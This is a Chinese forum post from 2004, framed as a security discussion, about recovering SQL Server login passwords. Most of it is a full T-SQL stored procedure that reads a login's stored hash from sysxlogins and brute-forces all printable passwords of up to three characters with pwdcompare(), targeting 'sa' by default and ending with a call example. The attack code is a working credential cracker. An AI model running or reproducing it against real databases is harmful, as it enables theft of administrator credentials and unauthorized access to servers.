关于sql server sa密码的破解的一个方法,抛砖引玉,请高手们讨论!
老宛 2004-08-06 02:45:36 呵呵,涉及到sql server的安全性,兄弟们要注意了
小弟最近发现了sql server加密密码的函数pwdencrypt(),在sp_addlogin存储过程中,又发现了口令比较的函数pwdcompare(),在sp_password存储过程中,虽然是单向加密的,但是能通过穷举来猜到sa的密码,当然其他的登录帐户的密码也是可以猜到的
IF EXISTS (SELECT name
FROM sysobjects
WHERE name = N'sp_get_password'
AND type = 'P')
DROP PROCEDURE sp_get_password
GO
--查找登陆帐号密码的存储过程(测试,只能找3位的密码)
CREATE PROCEDURE sp_get_password
@username varchar(255)='sa'
AS
DECLARE @EncryptedPWD varbinary(255),@password varchar(255)
set @EncryptedPWD=null
SELECT @EncryptedPWD=[password] FROM [master].[dbo].[sysxlogins]
where [name]=@username
IF @EncryptedPWD is null
BEGIN
SELECT @USERNAME AS 用户名,'没密码' AS 密码
RETURN
END
DECLARE @I1 INT
DECLARE @I2 INT
DECLARE @I3 INT
DECLARE @I4 INT
DECLARE @I5 INT
DECLARE @I6 INT
DECLARE @I7 INT
DECLARE @I8 INT
DECLARE @I9 INT
DECLARE @I10 INT
DECLARE @J INT
--查找1位的密码
SET @I1=33
WHILE @I1<127
BEGIN
SELECT @password=CHAR(@I1)
IF pwdcompare(@password, @EncryptedPWD, 0)=1
BEGIN
SELECT @username as '用户名',@PASSWORD as '密码'
RETURN
END
SELECT @I1=@I1+1
END
print '1'
--查找2位的密码
SET @I2=33
WHILE @I2<127
BEGIN
SET @I1=33
WHILE @I1<127
BEGIN
SELECT @password=CHAR(@I2)+CHAR(@I1)
IF pwdcompare(@password, @EncryptedPWD, 0)=1
BEGIN
SELECT @username as '用户名',@PASSWORD as '密码'
RETURN
END
SELECT @I1=@I1+1
END
SELECT @I2=@I2+1
END
PRINT '2'
--查找3位密码
SET @I3=33
WHILE @I3<127
BEGIN
SET @I2=33
WHILE @I2<127
BEGIN
SET @I1=33
WHILE @I1<127
BEGIN
SELECT @password=CHAR(@I3)+CHAR(@I2)+CHAR(@I1)
IF pwdcompare(@password, @EncryptedPWD, 0)=1
BEGIN
SELECT @username as '用户名',@PASSWORD as '密码'
RETURN
END
SELECT @I1=@I1+1
END
SELECT @I2=@I2+1
END
SELECT @I3=@I3+1
END
PRINT '3'
SELECT @username as '用户名','没有找到' as '密码'
GO
--调用示例
sp_get_password
--sp_get_password 'zj'